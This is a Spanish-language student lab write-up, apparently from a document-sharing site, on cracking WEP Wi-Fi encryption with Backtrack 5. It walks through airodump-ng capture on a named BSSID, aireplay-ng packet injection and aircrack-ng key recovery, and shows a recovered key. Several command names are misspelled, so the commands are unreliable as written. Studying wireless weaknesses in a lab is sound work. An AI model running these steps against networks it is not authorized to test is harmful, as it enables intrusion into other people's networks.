backtrack 5

12
SEGURIDAD EN WI-FI CON PROTOCOLOS WEP OBJETIVO: Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi. MATERIAL A UTILIZAR: CD Backtrack 5 descargables de: http://www.backtrack- linux.org/downloads/ Sistema operativo Linux. TOPOLOGÍA A UTILIZAR:

Upload: jeison-candamil

Post on 26-Jul-2015

493 views

Category:

Documents


0 download

TRANSCRIPT

Page 1: Backtrack 5

SEGURIDAD EN WI-FI CON PROTOCOLOS WEP

OBJETIVO:

Desarrollar habilidades y conocimientos con respecto a la forma de vulnerar el servicio de seguridad WEP en redes inalámbricas tipo Wi-Fi.

MATERIAL A UTILIZAR:

CD Backtrack 5 descargables de: http://www.backtrack-linux.org/downloads/

Sistema operativo Linux.

TOPOLOGÍA A UTILIZAR:

Page 2: Backtrack 5

PROCEDIMIENTOS PARA ACCEDER A UNA RED

Paso # 1: ingresar Backtrack5-ubuntu

Paso # 2: al ingresar al Backtrack5, nos pide login: root y password: toor cuando arranque la interfaz ponemos la siguiente línea:

#aeromon-ng (este identifica que tarjeta de red se tiene en el equipo) después

Page 3: Backtrack 5

#airodump-ng wlan0 (esta escanea las redes que hay alrededor, wlan0 tarjeta de red de nuestro equipo).

#Iwconfig wlan0 (muestra los datos de la tarjeta).

# sudo ifconfig wlan0 down (este bajo los servicios de la tarjeta de red)

# sudo Iwconfig wlan0 mode monitor (ponerlo en modo monitor)

# sudo ifconfig wlan0 up (este nos sube los servicios del a tarjeta)

# sudo Iwconfig wlan0

Page 4: Backtrack 5

Volvemos al paso a escribir airodump-ng wlan0 para escanear las redes que hay al nuestro alrededor, en este paso escogemos la red que vamos a craquear (como muestra la figura a continuación.)

Debemos tener en cuenta los números de:

BSSID CANAL ESSID - CLIENTE

Page 5: Backtrack 5

#airondump-ng –w otro –c 1 –bssid 20:CF:30:37:9F:A8 wlan0

Estas especificaciones son la de la red que vamos a atacar, es necesario escribir el bssid en mayúscula.

Otro (nombre de la carpeta donde va capturando los archivos) -c (canal de la red).

BSSID CANAL ESSID

20:CF:30:37:9F:A8 CH 1 45159902

NOTA: en este paso esperamos a que mínimo tenga 30.OOO paquetes, debajo del DATA.

Page 6: Backtrack 5

Ahora abrimos otra consola:

#aireplay-ng -1 0 –a 20:CF:30:37:9F:A8 wlan0

(Trabajamos mientras van cargando los archivos)

Page 7: Backtrack 5

Abrimos otra consola

# aireplay-ng -3 -b 20:CF:30:37:9F:A8 wlan0

(Este inyecta el tráfico. Este paso no funciona bien en todos los dispositivos wifi, dependiendo de los drivers y núcleo de nuestro equipo. Esto nos permitirá

acelerar notablemente el proceso de captura de paquetes). 

Page 8: Backtrack 5

NOTA: las claves salen en hexadecimal y ASCII

En esta misma consola escribimos

#dir otro.cap (este es el archivo de nosotros con extensión .cap) nos saldrá la siguiente pagina.

#aircrack-ng otro.cap key found (esta es la clave del enrutamiento)

Page 9: Backtrack 5

Esta es la clave: BEBDFF5052B42 es la de la red que atacamos 45159902, a continuación comprobamos que si es la clave correcta.

CLAVE: BEBDFF5052B42

Page 10: Backtrack 5
Page 11: Backtrack 5

CONCLUSION

Con en el laboratorio hemos concluido que la seguridad en las redes inalámbricas es imprescindible siempre tener la en cuenta, ya que hay muchas transmisiones que no son seguras, es casi que obligatorio asegúralas para la confiabilidad de los datos como la integridad y autenticidad de estos mismos. Apresar que WEP está incluido en la norma de la IEEE no proporciona seguridad total. Uno de los problemas más latentes en la utilización de vectores al iniciarlo, ya que no tiene cifrado de mensajes (clave secreta).

El protocolo WEP no debe ser la única herramienta o política para asegura datos o contraseñas se debe de implementar otras alternativas y mantener controles para la confiabilidad e integridad de datos y demás.